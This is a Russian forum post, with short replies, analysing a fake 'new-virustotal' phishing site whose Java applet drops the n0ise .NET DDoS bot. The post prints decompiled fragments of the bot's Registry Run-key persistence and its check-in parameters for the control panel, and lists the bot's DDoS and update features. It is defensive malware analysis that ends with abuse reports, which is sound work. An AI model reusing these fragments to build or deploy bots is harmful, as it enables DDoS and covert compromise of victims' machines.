new-virustotal.tk - ковыряем фальшивый "вирустотал" + лодыря + мальварь.

Тема в разделе "Статьи", создана пользователем onthar, 23 май 2011.

  1. onthar
    onthar Продвинутый
    Симпатии:
    224
    Привет. Читая твитер, наткнулся на ссылку с форума malwaredomainlist. В топике рассказывалось о спаме с ссылкой на якобы новый virustotal - http://new-virustotal.tk

    Стало любопытно, что там. Зайдя на указанный сайт видим визуальную копию оригинала

    [​IMG]​

    В исходном коде фрейм:

    [​IMG]​

    Переходим на сайт, указанный в сорце, визуально все то же самое, в сорцах копия оригинального сайта, а вот несколько строчек в конце:

    [​IMG]​

    намекают на то, что грузится вредоносный ява-апплет, который в свою очередь выгружает некий файл bot.exe.

    [​IMG]

    [​IMG]

    [​IMG]

    [​IMG]​

    Получаем мы в итоге файл, дропнутый в c:\Documents and Settings\[ИМЯ ЮЗЕРА]\bot.exe, весом в 102 кбайта, написанный на .NET.

    [​IMG]​

    Что же это за файл? Вирустотал говорит следующее: http://www.virustotal.com/file-scan...33381bb0cd8afa4d348f2503fa071da1be-1306096763
    Раз мы столкнулись с .NET, то стоит засунуть в декомпилятор.
    Что мы видим? Это известный n0ise ddos bot.
    Бинарник обвешан кучей анти-реверсерских функций:

    [​IMG]​

    Бот собирает инфу о системе, и если обнаруживает, что запущен на виртуалке, то процесс убивается.

    Запись в автозапуск:
    PHP:
    Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", true).SetValue(cMain.ConfigClass.sRegName[0], '"' + cMain.ConfigClass.sFilePath[0] + '"');
                
    Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", true).SetValue(cMain.ConfigClass.sRegName[1], '"' + cMain.ConfigClass.sFilePath[1] + '"');
    Так бот регистрируется в админке:
    PHP:
    private void registerCCServer()
    {
        
    string parameters = "mode=0&hwid=" + cMain.ConfigClass.sHWID + "&botver=" + cMain.ConfigClass.sBotVersion + "&pcname=" + cMain.ConfigClass.sPCName + "&winver=" + cMain.ConfigClass.sWinVersion;
    В фукционал бота входят:
    • ДДоС разных типов
    • Самоликвидация бота
    • Апдейт бота
    • Посещение сайтов.

    А вот и адрес админки в строках:

    [​IMG]​

    В общем-то все. На данный момент домен уже умер, обузы были отправлены хостеру, регистратору.
    Демонстрацию анализа мождно посмотреть на ютубе. Видео долгое - 25 минут, качество не ахти, но кого интересует анализ файлов - советую посмотреть.

    http://www.youtube.com/watch?v=9J_5EPzs_hs
    ​

    (с)Onthar. При копировании не забывайте поставить ссылку на оригинальный топик.​
     
    Последнее редактирование: 23 май 2011
    23 май 2011
    3 пользователям это понравилось.
  2. NightWolf
    NightWolf Guest
    Онтар извини за оффтоп но что за тема на хроме?
     
    23 май 2011
  3. onthar
    onthar Продвинутый
    Симпатии:
    224
    Это общесистемная тема. Elegant Gnome.
     
    23 май 2011
  4. milzz
    milzz Guest
    n0ise ddos bot он же требует net framework 3.5 умные люди нет? там отстук из 10 скачавших отстучит 3 :D
     
    23 май 2011
  5. onthar
    onthar Продвинутый
    Симпатии:
    224
    milzz, второй он требует фреймворк, по крайней мере именно этот сэмпл.
     
    23 май 2011
Загрузка...